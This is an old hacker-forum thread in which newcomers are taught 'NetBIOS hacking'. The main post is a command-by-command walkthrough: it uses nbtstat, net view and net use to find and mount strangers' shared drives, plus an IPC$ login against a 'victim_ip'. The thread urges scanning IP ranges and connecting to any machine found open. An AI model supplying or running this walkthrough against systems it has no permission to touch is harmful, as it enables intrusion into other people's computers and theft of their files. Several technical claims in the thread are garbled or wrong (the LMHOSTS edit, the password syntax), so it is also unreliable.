NetBIOS

A safe place for newbies. You won't get flamed here, as long as you've put in some effort before posting (i.e: Google)...
Post Reply
industri_ma
Hacker in Training
Posts: 68
Joined: Fri Nov 01, 2002 11:04 am
Contact:

NetBIOS

Post by industri_ma » Sun Nov 10, 2002 12:35 pm

Ok i dont know why even took my time to do this i guess i was bored.......anyway in the "Hacking with Netbios" tutorial on the end it says "Now go out and scan and network or a computer for port 21 open" it says something like that........but port 21 is the FTP port and 139 is the real netbios port tell me if i'm wrong about this!

chieftan
Network nirvana
Posts: 622
Joined: Tue Aug 27, 2002 9:43 am
Contact:

No...you are correct

Post by chieftan » Sun Nov 10, 2002 2:08 pm

You will actually find that ports 137, 138 and 139 use netBIOS and ports 20 and 21 use FTP.

The reason that it says port 21 is that you will need this for the file transfers.....

industri_ma
Hacker in Training
Posts: 68
Joined: Fri Nov 01, 2002 11:04 am
Contact:

Ok.......

Post by industri_ma » Sun Nov 10, 2002 2:43 pm

Ok.....

User avatar
YoGi
Owns you
Posts: 1303
Joined: Tue Jul 16, 2002 12:57 am
Location: Niger, Africa
Contact:

Post by YoGi » Sun Nov 10, 2002 3:05 pm

ftp usually has shares on it....
-----YoGi-----

I'm naked under all my clothes.....

Silverbullet951
n00b
Posts: 19
Joined: Sat Nov 30, 2002 12:31 pm

Post by Silverbullet951 » Sat Nov 30, 2002 12:41 pm

HI I'm extremely new to all of this, now how come I can't find any hosts? It always tells me that there is no host found. WHy is that? Thanks a lot.

industri_ma
Hacker in Training
Posts: 68
Joined: Fri Nov 01, 2002 11:04 am
Contact:

No subject

Post by industri_ma » Sat Nov 30, 2002 1:35 pm

That means that the host doesn't exist or it doesn't have netBIOS enabled!

Silverbullet951
n00b
Posts: 19
Joined: Sat Nov 30, 2002 12:31 pm

Post by Silverbullet951 » Sun Dec 01, 2002 12:41 am

Thanks , Let's say, If I were to get into one, How do I use LMHOST? Thanks again, I'm sure I'll be able to get use to it pretty soon.

industri_ma
Hacker in Training
Posts: 68
Joined: Fri Nov 01, 2002 11:04 am
Contact:

Post by industri_ma » Sun Dec 01, 2002 9:17 am

You search for the LMHOST file then you open it with text program like wordpad then look for the line #DOM:<domain> and write the ip like this #DOM:127.0.0.1

Silverbullet951
n00b
Posts: 19
Joined: Sat Nov 30, 2002 12:31 pm

Post by Silverbullet951 » Sun Dec 01, 2002 1:23 pm

I tried it on my friends computer and it worked. He has win 98, I have win XP and none of the Ip's work. Could XP be the problem?

Silverbullet951
n00b
Posts: 19
Joined: Sat Nov 30, 2002 12:31 pm

Post by Silverbullet951 » Sun Dec 01, 2002 1:24 pm

Also, how can i get more ip addresses on my computer? I only have two. Thanks.

User avatar
weazy
Ex-Admin
Posts: 1688
Joined: Sun Jul 07, 2002 10:02 am
Location: any given
Contact:

jeesh

Post by weazy » Sun Dec 01, 2002 1:52 pm

if it werent for netbios, it seems like we wouldnt have anything to talk about on this forum.

User avatar
weazy
Ex-Admin
Posts: 1688
Joined: Sun Jul 07, 2002 10:02 am
Location: any given
Contact:

BTW

Post by weazy » Sun Dec 01, 2002 1:53 pm

i have posted a poll under the introduction forum. please take 2 pico seconds to respond

sk8

Post by sk8 » Sat Dec 21, 2002 6:07 pm

NetBIOS stands for Network Basic Input Output System and is used in Windows for its file and printer sharing.


To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:

25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

If your results look like that then you're set...

about nbtstat

To get the info you need for the attack we use a program called nbtstat:

Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.



code:--------------------------------------------------------------------------------
c:\>nbtstat -A 127.0.0.1
--------------------------------------------------------------------------------


Use -A if you're using IP addresses. If you're going to use hostnames use -a.

This will give you what is called a nametable:


code:--------------------------------------------------------------------------------
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx
--------------------------------------------------------------------------------


This is a friend's nametable (as i am not running Windows) (names and workgroups have been edited to save him from elite_hax0rs)

Now, the line

code:--------------------------------------------------------------------------------
computername <20> UNIQUE Registered
--------------------------------------------------------------------------------

is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress


code:--------------------------------------------------------------------------------
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment

-----------------------------------
SharedDocs Disk
The command completed successfully.
--------------------------------------------------------------------------------


That's the result you should get (it wil be different on a non-WinXP box ).

Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name

code:--------------------------------------------------------------------------------
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
--------------------------------------------------------------------------------


Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:

code:--------------------------------------------------------------------------------
c:\>cd g:
g:\>
--------------------------------------------------------------------------------


In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:

code:--------------------------------------------------------------------------------
c:\>net use /delete g:
g: was deleted successfully.
--------------------------------------------------------------------------------


Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:

code:--------------------------------------------------------------------------------
net use password \\ip\sharename
--------------------------------------------------------------------------------
(not sure about that one...)



Moral of this story: always cover port 139.

(Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp")(sortof)...

Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445



GOD DAMN WHERE IS THAT CODE BUTTON I HAD TO TYPE STRIPES ALL THE @#! TIME /me thinks that he should fix it =p

now someone would ask " So when you port scan a system and netbios services are open you can just use net to connect and rummange through their directories?"

and i ll answer him
"Sometimes...

Depends if there are actually drives shared, and depends on if passwords are set."

To connect to Windows NT/2k share:

-------------------------------------------------------------------------------
c:\>net use \\victim_ip\ipc$ password /user:username

c:\>net view \\victim_ip

c:\>net use * \\victim_ip\share
-------------------------------------------------------------------------------

another one would ask... "if u have a firewall doesnt it protect all ports?"

and i would answer "Blocking the netbios ports is a good start but if I were you I would like to go a step further and uninstall netbios all together. (thats a different story, i ll xplain it some other time =p )

i could xplain how to hack NETBIOS with linux or xplain how NETBIOS works but i am too lazy now =p
maybe another time when i am not bored =p

well... as i can see i can STILL remember all those Windows shit =)

Silverbullet951
n00b
Posts: 19
Joined: Sat Nov 30, 2002 12:31 pm

Post by Silverbullet951 » Sat Dec 21, 2002 9:15 pm

THanks for the info. NOw, HOW do I check for open ports? DO I need a special program? Thanks , and BTW, I would really like to know how to use linux to hack a netbios. THat would be really helpful.

Silverbullet951
n00b
Posts: 19
Joined: Sat Nov 30, 2002 12:31 pm

Post by Silverbullet951 » Sat Dec 21, 2002 10:11 pm

ok, I did a scan, pop -3 110 was open, now what? I tried to use net bios, but it said Host not found. WHy is that?

sk8

Post by sk8 » Sun Dec 22, 2002 8:19 am

umm to find a port open scan for certain IP ranges till you find a port open. then use the methods describted above and connect to the system.

i ll xplain another time how to hack in to netbios using linux, too bored now q=

User avatar
weazy
Ex-Admin
Posts: 1688
Joined: Sun Jul 07, 2002 10:02 am
Location: any given
Contact:

Post by weazy » Fri Dec 27, 2002 9:41 pm

there are several good tutorials on netbios hacking at hackerthreads.org. also, search the forum for netbios, you will find a lot of info on this topic.

weazy
--The Devil is in the Details--

Post Reply